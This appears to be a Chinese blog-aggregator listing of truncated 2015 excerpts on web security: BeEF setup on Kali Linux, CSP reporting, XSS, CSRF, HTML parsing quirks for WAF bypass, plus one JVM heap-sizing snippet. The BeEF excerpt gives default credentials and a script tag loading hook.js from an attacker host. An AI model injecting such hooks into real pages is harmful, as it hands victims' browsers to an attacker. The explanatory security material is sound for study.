Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:43:32
阅读次数:
692
Kalilinux系统默认未安装beef,需要自行安装12apt-getupdateapt-getinstallbeef-xss启动/usr/share/beef-xss12cd/usr/share/beef-xss./beef账号密码127.0.0.1:3000/ui/pannelbeef/beef嵌入代码<scriptsrc="Ip:3000/hook.js">与Metasploit联动Beef配置文件/usr/share/bee..
分类:
其他好文 时间:
2015-03-18 06:42:11
阅读次数:
187
用过CSP的都很郁闷,上报的只有违规的站点名,却没有具体路径。这是缺陷,还是特意的设计?显然,CSP是为安全定制的,里面的规范自然要严格制定,否则就会带来新的安全问题。如果支持详细路径的上报,那又会引出什么问题?由于CSP会上报所有的请求,甚至包括重定向的,因此可以..
分类:
其他好文 时间:
2015-03-17 12:43:12
阅读次数:
128
前端主要面临俩种类型的威胁1.XSS(Cross Site Scripting) 攻击方式:恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。2.CSRF(Cross-site request forgery跨...
分类:
Web程序 时间:
2015-03-17 00:40:00
阅读次数:
235
CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在并未授权的情况下执行在权限保 护之下的操作,有很大的危害性。然而,该攻击方式并不为大家所熟知,很多网站都有 CSRF ...
分类:
其他好文 时间:
2015-03-16 22:38:13
阅读次数:
127
1.HTML是一种标记语言 2.HTML元素不区分大小写 //可以在xss绕过waf时使用 3.为空元素标签 为自闭合标签 虚元素标签 用空元素标签形式表示的虚元素标签 4.一个元素可以应用多个属性,这些属性间用空格分隔 5.属性顺序没有要求 6.布尔属性 例如:disabled disabled=...
分类:
Web程序 时间:
2015-03-16 14:27:59
阅读次数:
179
CSRF (Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,该攻击可以在受害者毫不知情的情况下以受害者名义伪造请求发送给受攻击站点,从而在并未授权的情况下执行在权限保护之下的操作,有很大的危害性。 CSRF 攻击实例 CSRF 攻击可以在受害者毫不知.....
分类:
Web程序 时间:
2015-03-16 12:40:34
阅读次数:
478
堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下...
分类:
其他好文 时间:
2015-03-15 21:16:01
阅读次数:
141
在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 [1] 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了,所以我对用...
分类:
其他好文 时间:
2015-03-15 12:23:44
阅读次数:
184
首先需要声明,本文纯属一个毫无远见和真才实学的小小开发人员的愚昧见解,仅供用于web系统安全方面的参考。1、 反射型XSS漏洞如果一个应用程序使用动态页面向用户显示错误消息,如果系统没有对用户输入的内容进行过滤和处理,就会造成一种常见的XSS漏洞。
提取用户提交的输入并将其插入到服务器响应的HTML代码中,这是XSS漏洞的一个明显特征;如果应用程序没有实施任何过滤或净化措施,那么它很容易受到攻击。...
分类:
其他好文 时间:
2015-03-13 16:33:21
阅读次数:
163
